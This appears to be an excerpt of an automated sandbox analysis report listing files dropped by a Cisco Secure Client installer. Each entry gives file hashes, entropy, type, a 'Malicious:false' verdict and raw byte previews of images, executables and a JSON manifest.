                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\unpinned_button.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4370
                                                                                                                                      Entropy (8bit):7.900909498577029
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                      MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                      SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                      SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                      SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\vpn_connected.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5558
                                                                                                                                      Entropy (8bit):4.450533821817726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                      MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                      SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                      SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                      SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .(...&......... .h...N...(... ...@..... ........................................................................ ...`...................................................................................................................p.........................................................~...~...}...}...}....0........................................`................z]J.M'..'....hm.)...................................................................................................z]J.M'..M'..M'..M'..'...%x}.+...............................................................................................M'..M'..M'...kY..............x}.....!....................................................................................xh.M'..M'..z]J.....................8y}.4...#................................................................................xh.M'..M'..............................Az~.=...%......................................................................p........M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\vpn_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9736
                                                                                                                                      Entropy (8bit):7.95835565935799
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                      MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                      SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                      SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                      SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx......}....j'.b.*A...H.8B.p....IXM.Q....db..D...!.*#aI..J.h..M"k?...k..t.......+!j...T7.N.y9.r........o..e......{.....?...B..\i...... ........T...u ~.h...J.4..%"..k.^...O.....".....v...+7...........M....J.z....E..(...0M+.S.R"._.2.Y..h...J.+J.+.*.@..-5....T.......E+.4WZG)q.H...k.]..|C...*,.P.O9.72{.......]y.....}J.:Dd;C.|@..8J.....rEh.......c..|?......A.D}....J.[...<E.C)y.....J.A.. i...&8.3y...t.x.9bx .6......W..&......zV^9......e..VFPA..$..b...4q.L...&..R.....7.....aK..A...........6%V....=A.f.2$Ve.ue={.8....#.....7..V.P..FE9..#> ..OuDj...ME......*....+](Z).\i]...H#....>E....N**pb..>+;....X.....z6...E+aT..L.U.."5..YtS...l[....'..u..qsV.k..h%DM..(l...u.5.e.YN.H.'&.C......Qbu.....EA.....l......!.Um......Q....n.b.*.l{t.<.+l..B{.W.P.".E..V,..._.@....... X.Y6F......}i..j.rUY.@'v \k7<.&.b....V..+....-Vn..g..X.d\.ak..K...U.@...ZToS...........,8np.....l..G.P.|.r.MA.B)V..."....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\vpn_logo_72.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2002
                                                                                                                                      Entropy (8bit):7.874049849617631
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                      MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                      SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                      SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                      SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..{lSU...vK.nl%.6..... ...0.q#D.?d....C1!j..G.Q0.,A:b.q..5d...L%...H..I@.9..B.G..E.=.SN.n....n.&..]...........A1..Z\BD6"..G.?..AD.~....l?...G...Z.KD.DTAD%.{.V,a....(#=..{..a:........)/.H-Dt..l.f....l-.p(5.;.ge2 E.K.....ro?....9v.9.....r.m...8.-.....JW.....K............\..]OP..R...lz...J...|P..uP.-.*..J3 ...Ui.......OxcK..@...L.Bl..8....{M.b...m.b.1....^.(...UG.M..2[..x..k.[K;.=G.SR5.....Fh{...|..qo..8....PR._0[..&...SR....^..(M.d6.B .Lek...<j;}.r.s..k........q8M........z..5..MkV/..?]J......kw8.B.b..:...qW...U.g^..O.}.|/$@.s..0].r..twR..o.7.....4.J.Gs-6.....C.@..Ho8.s..0u...{..r3.Ri.S.U.B....Vm...Y...9.K}.`..7U..y..I.....j................+..d.p].'.>.O..U.....<....F..X.....9.M..5w....e>@wO[.<C).r.|.Z.....e.....t..>............E].N:xa...,)Y....T4.a.~.U..0.^U8.A..............|Y.....@O...)?)..9.v^...W.#.2-M.:M.@..O.......l....T..L.....,..P.''...E...ZUX@-..P.V&eX.......M*...<.c+.A....K...V.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Uninstall.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1006184
                                                                                                                                      Entropy (8bit):5.97738342017222
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:9/9IZHQOBWLxPXdwWeKHI0+DPwYZC3Yeba96ga8nXNBZK/8id:9V2HQO6PqtPwJ3Yijg/dB0Ei
                                                                                                                                      MD5:744D2DC7CA442E065AC4F23C6A7B9E5F
                                                                                                                                      SHA1:0039BE9938086F925F321EC8B2FD4D008F600C1A
                                                                                                                                      SHA-256:4E9E9F15FFBFC9729F4BC561D8670214A86822D682F49A2B286BB798FD59B549
                                                                                                                                      SHA-512:918009B74EAF5CD932E7BFE1CBD65425917D8CFCDB32B6A10FF2DD44A894E06DA77544522B72F77880D1ADD9961DB0A3401CC20242976E241499F65899E76826
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.j....X...X...X...Y...X...Y...X...Y...XI..Y...XI..Y...XI..YK..X...Y...X...X...X...Y...X...X...X...X...X...Y...XRich...X........................PE..L.....d.....................F......P.............@..........................`......>.....@.................................@........P..P...............hH.......Q...w..T...................@y......Hx..@............................................text............................... ..`.rdata...!......."..................@..@.data....)... ......................@....rsrc...P....P......................@..@.reloc...Q.......R..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UpdateComponentManifest.json (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):451
                                                                                                                                      Entropy (8bit):3.838636988372643
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:3FFU5eWNwSrzakk5CGvFF6cqEPtvFFEHxiulEk9bkNy4SQUa:1e5eU/aHHAcqE/uxiTKTM
                                                                                                                                      MD5:F31B286BC9DAC414CAE57B36020FDB4A
                                                                                                                                      SHA1:BD9D861EA0BC7DBDB9A1C9949ADFB7BDF3345C6B
                                                                                                                                      SHA-256:7778B7BB7E7F9D25D71747BAA3BEB76E39C0336EB9DA0D823D7C6297540E7975
                                                                                                                                      SHA-512:937B660BDD91A8467DB83F9B5B25046D0443EB2648671CE420F9A032123A479B249B9001D860BDA4FE3488065F0FF02AD01BA758CB11EE07710C7651FA072945
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "downloader" : {.. "display-name" : "Cisco Secure Client - Downloader",.. "type" : "exe",.. "uri" : "binaries/vpndownloader.exe",.. "hash" : "7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3",.. "hash-type" : "sha256",.. "version" : "5.0.05040".. }..}..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\VACon64.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):745576
                                                                                                                                      Entropy (8bit):6.225379685413281
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:Qx5TysIG9cavT2FWgBKkuD/wQoJ4GMJzu:cxIGKavT2FWz/wQffzu
                                                                                                                                      MD5:DB9F087F33F5375F0883F4E29F81074C
                                                                                                                                      SHA1:1D9715CDFA425F4F6FA14D80233B9ECE8F9AA89E
                                                                                                                                      SHA-256:5D27CE634581F9CEE12C17D9F4AD6AB1B7C6BCDBB911618E7416D2FB4F1981F0
                                                                                                                                      SHA-512:A740845C79909898881742BA552F8358EE35EA33077A41EA2F9BC4FA824923956AFB1AB3D7870FEE626110BB51FC347AC3D04A2D84747D99EA98B1F3E9FB98C0
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\.h3.m.`.m.`.m.`...a.m.`...a.m.`...a.m.`J..a.m.`J..a.m.`J..aJm.`...a.m.`.m.`.m.`...a.m.`...`.m.`.m.`.m.`...a.m.`Rich.m.`........................PE..d......d.........."......V.......... ..........@..........................................`.....................................................x....0..P........8......hH...@...5......T.......................(......8............p...............................text....T.......V.................. ..`.rdata...%...p...&...Z..............@..@.data....2..........................@....pdata...8.......:..................@..@_RDATA....... ......................@..@.rsrc...P....0......................@..@.reloc...5...@...6..................@..B........................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\WebView2Loader.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):119912
                                                                                                                                      Entropy (8bit):6.60185962501979
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:pykiJ1Z1K95jvS8BBw/qZqocqQThEt9WSt6MlNNp:MkiHTMBBaNEtUS9lNz
                                                                                                                                      MD5:E418E6429D29325A842E8A5F01B57236
                                                                                                                                      SHA1:D075045BC923F0AD63907CDF47AF6FE7B40DB49C
                                                                                                                                      SHA-256:EAD03108A441D27DC347649DDA3F5BBD2144B5EC35B775944761F7BBFFC95CB2
                                                                                                                                      SHA-512:92969A8394DF09973DE2F5E8A528A41EC046B5C0CCA3292CD734DF900AF1EB85A3C8643273051D1E2B27B82EC992D61559A9BB06A4B49064FECCB64EB35D2876
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....'b.........."!................@>....................................................@A........................M_......?`..(.......................hH..........D\.......................Y......`................a..<....]..`....................text............................... ..`.rdata...n.......p..................@..@.data........p.......d..............@....00cfg...............n..............@..@.tls.................p..............@....voltbl.H............r...................rsrc................t..............@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\ac_sock_fltr_api.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):286824
                                                                                                                                      Entropy (8bit):6.617095335993768
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:tnTXBb1av9tRiTYNC2s2jSPah5WQXR+1XAOtMFK:Lcv9tRiUNLV+1XHf
                                                                                                                                      MD5:A46C978EB55D64043AAC769320503C12
                                                                                                                                      SHA1:60AD2BB287B1E6F768EA873B1390ACA13A853999
                                                                                                                                      SHA-256:19E4270B838CBC3054175427E9C5DA3BBACD92A0E69ECE036C490FC3F13302B1
                                                                                                                                      SHA-512:DFD94979A6AD9AF454C40324A42FD83CB0F14E2EEFEBF81810DEB5A4A24E0EA3B6466E0D28E32BBC0192D732B9D6B2429843E22F7E07F42D2EBE5835A3E47ACE
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5I.Rq(..q(..q(..eC..|(..eC...(..eC..g(..#]..~(..#]..e(..#]..&(..eC..p(..eC..|(..q(...(...]..}(...]..p(...]u.p(..q(..p(...]..p(..Richq(..................PE..L...c..d...........!.........~...............................................`............@.........................P...........x.... ..................hH...0..,(..t...p..............................@............... ............................text............................... ..`.rdata..*#.......$..................@..@.data...d'..........................@....rsrc........ ......................@..@.reloc..,(...0...*..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscocrypto.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1865320
                                                                                                                                      Entropy (8bit):6.970258455602142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:cN4UkzzVwcS5/h2m7tPpbO8in1CPwDv3uFbvYdkYuj:cNb/h26XbO8K1CPwDv3uFbv3
                                                                                                                                      MD5:401E2AAFE861E1BBCC04EEED82868DBF
                                                                                                                                      SHA1:D4ADD73521989319137E731485CE64DC370AAFE6
                                                                                                                                      SHA-256:09EF0662458A6B07BC5B063576981CACF74E7E7B3FD355FF6EF49395A8D95183
                                                                                                                                      SHA-512:891731F36B327E2B33AC31C39E869D8FE4CB4A7B289F3183857A0671C5DACA700552A5EAF29A07AC537330B57A0C45DC27DDE8AA5B7AC33C9F8A6F8E9B1EE968
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........],.<B..<B..<B..D..<B..IC..<B..IG..<B..IF..<B..IA..<B..WC..<B..<C.'<B..<B..<B..IF..>B..IB..<B..I...<B..I@..<B.Rich.<B.........................PE..L.....Od...........!......................................................................@A........................@^......XH..T.......................hH......|....Y..T...........................`Y..@............................................text...8........................... ..`.rdata..bf.......h..................@..@.data....N...`.......H..............@....rsrc................^..............@..@.reloc..|............d..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscossl.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):449128
                                                                                                                                      Entropy (8bit):6.524987350757864
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:H42omt0CD5eYwFZ6depVyQ7YAf1ZMGnz8J4N4OTW8kd6ghNu99hO5nxjOE6ARsMp:LqN4//sHTTHx4KtsutnLlEa2
                                                                                                                                      MD5:5608F2FEEEC9519ABC4C45AD6156F224
                                                                                                                                      SHA1:55B1E59342A3F0011714E146A0FFDB52CDE267DD
                                                                                                                                      SHA-256:3DEC5D47533E9DCCAF3F851DE4D37E289407CB9064CD1F32ADD08D2ABFAB75D4
                                                                                                                                      SHA-512:FF605F0F7EC45BE82696D1FAB43D74C59991AFC692C61674CA7317DF1C9953EE25D65AC94910D856EB98E6D48C280D8298C54C09BA2346B9A1959E9071ECF717
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-..~..~..~..]~...~......~......~......~......~......~......~..~...~......~......~..1~..~......~Rich..~........................PE..L.....Od...........!................p.....................................................@A.............................;..l........p..................hH.......;......T...............................@...............X............................text.............................. ..`.rdata.............................@..@.data...l....P.......6..............@....rsrc........p.......P..............@..@.reloc...;.......<...V..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\accurl.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347752
                                                                                                                                      Entropy (8bit):6.708372875308561
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:xS6/w5Vk2RM0ZdTNd5JYjV7JYwXhik4QNEN519X+Iw99Itmf:xS5Vk2RtZw5JYwXhpzyNttg
                                                                                                                                      MD5:84EB38D113F69752F45B9A1852536093
                                                                                                                                      SHA1:D24161590E4C7541D183A0871694DEFE92F81783
                                                                                                                                      SHA-256:276C98884E9945BC79AB4D84069CFE543752FBD064E88EE78DE0256F8B1DF374
                                                                                                                                      SHA-512:0B69B29809915DFC348AD36E528BE4DE5E251F30AA7E3FA1017F1F3A24FF315C4F5290423D15C62AA3E4F3AFA573362675177EC05E48B78FA2995C2D5F5BD310
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L/D.-A..-A..-A..U...-A..E@..-A.+....-A..ED..-A..EE..-A..EB..-A..K@..-A..D@..-A..-@..,A..DE.(-A..DA..-A..D...-A..DC..-A.Rich.-A.................PE..L...-m.b...........!.........*...............................................@............@................................T...@.......................hH.......3..P...T...............................@...............d............................text...U........................... ..`.rdata..D...........................@..@.data...\...........................@....rsrc...............................@..@.reloc...3.......4..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\acextwebhelper.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):491624
                                                                                                                                      Entropy (8bit):6.495709095629098
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:8UBgEIe9ncUGQljr+1x87dfK8k9rqXsPNcJESSFCejFp:rFyUIP8Hk9rpcJEmev
                                                                                                                                      MD5:CE72AE5437229CC4EAB1FCE6C2B10555
                                                                                                                                      SHA1:46177D24E1CC592FB31F3B9A88F7A4CCF5B4D742
                                                                                                                                      SHA-256:24C42AD6CC70A169AFE6232E87E94BB4DC7ADC64A1C58A2A7565D28171E1AED0
                                                                                                                                      SHA-512:282751765E46AC037E13E4FA0DFC34ECF8D5FD08B7358775E55F44D91B4267A38B3345095C180DDDCCBADFD6645D05744F1E3109BAF84678125A51D6DE6A1955
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*U.K;..K;..K;..3...K;..>?..K;..>8..K;..>:..K;..>>..K;.n>:..K;.. :..K;..>:..K;..K:..J;.n>2..K;.n>..K;..K...K;.n>9..K;.Rich.K;.........................PE..L...B..d............................`.............@.................................n9....@.................................H...T....................8..hH... ...W..x...T...............................@............................................text............................... ..`.rdata...$.......&..................@..@.data....5.......&..................@....rsrc...............................@..@.reloc...W... ...X..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\acfeedback.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):486504
                                                                                                                                      Entropy (8bit):6.862184684725985
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:cxog6V56WiNYPTL0x+/OB7hiCM/JFJQtqx:cxo/V56WiyPhe7kCM/fJQt0
                                                                                                                                      MD5:B5206EC55DD02AA88783189589F72953
                                                                                                                                      SHA1:F8180A92BEFAF78EED660435425B1B0B97BFA730
                                                                                                                                      SHA-256:F6F22F6C9A31CB561E69D5D5892EAA4A44A51FCF36AB27841A00AA07E33ABD68
                                                                                                                                      SHA-512:4A117F579A3BABBB7C6CF8072671E1363BEB63869030A2D0B376BBEFA448F88CC2CAED6F17026A5AB34A8E3E9B3EEF80DD8BD2441FAAF70D13F917DDA9FB8BAB
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......&.b...b...b...k.E.t.....+.f...0...h...0...d...0...{...0...f......d...v...j.......|...7...a...b.........n......c....).c...b.A.c......c...Richb...........................PE..L......d...........!.........N......P........................................`.......,....@A.........................}..x............................$..hH.......R..PL..T....................M.......L..@...............l............................text............................... ..`.rdata..............................@..@.data...x...........................@....rsrc...............................@..@.reloc...R.......T..................@..B........................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\acruntime.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):912488
                                                                                                                                      Entropy (8bit):6.783823890055007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:hzaSwCkln20SXQK4RjiqKSehi15NeM1+uFTXqNK+FrZeqQFXpB:h+SwCkl20VLipi15NeM1+oTorjoB
                                                                                                                                      MD5:2DAB87822AC2A484AC9D28D9BEEA60DC
                                                                                                                                      SHA1:F49F17CD267325EDC70651940E3322E602ECBF63
                                                                                                                                      SHA-256:88549D168B1062176C09C20A6A264432792A9C3DD291EBB34DDAA16E0C822CCA
                                                                                                                                      SHA-512:AB8F79AD1AF50D1537E288D5A1E36D65A2463C5F77113E02770DE85BA7058C6054EDC82165D14A061D151CA40D5128C88B9D314635E540D3439B2D8B407ABD42
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........]U...U...U...\...A......_...3.m.Q......._.......^.......J.......Q......J.......Q...A..D...U...[.......w.......T.....o.T...U...T.......T...RichU...........PE..L......d...........!.....V...T...............p............................................@A........................P....y..`z....... ..P...............hH...0.......O..p....................Q......0P..@............p...............................text...zU.......V.................. ..`.rdata..@G...p...H...Z..............@..@.data...._.......V..................@....rsrc...P.... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.cat (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11144
                                                                                                                                      Entropy (8bit):7.2926694421063205
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:RCFWAyKfdF3Ee2yKO3FWQFBacRSp0X01k9z3AJEx0ALqf:kTb3FR+cR00R9zoE6A+f
                                                                                                                                      MD5:606BE87B926A7967C1B822260307544F
                                                                                                                                      SHA1:256B68497E3C942D5545A73FEF4AB4575D4A6BEE
                                                                                                                                      SHA-256:8B8A4129AD0745ABE9C05BBC36C3C4F97B85C97ECADFC884B6FFBDB5CCEA7B33
                                                                                                                                      SHA-512:4FBD62B00CD6D5948ACB32FA2250A44C6B6370CAA4CCD9FD5BDCC0FB7B9FA746BF8F1F03C6A7870F815037CAC47D737EAF1A7A77A48D74358D054321BB3B5690
                                                                                                                                      Malicious:false
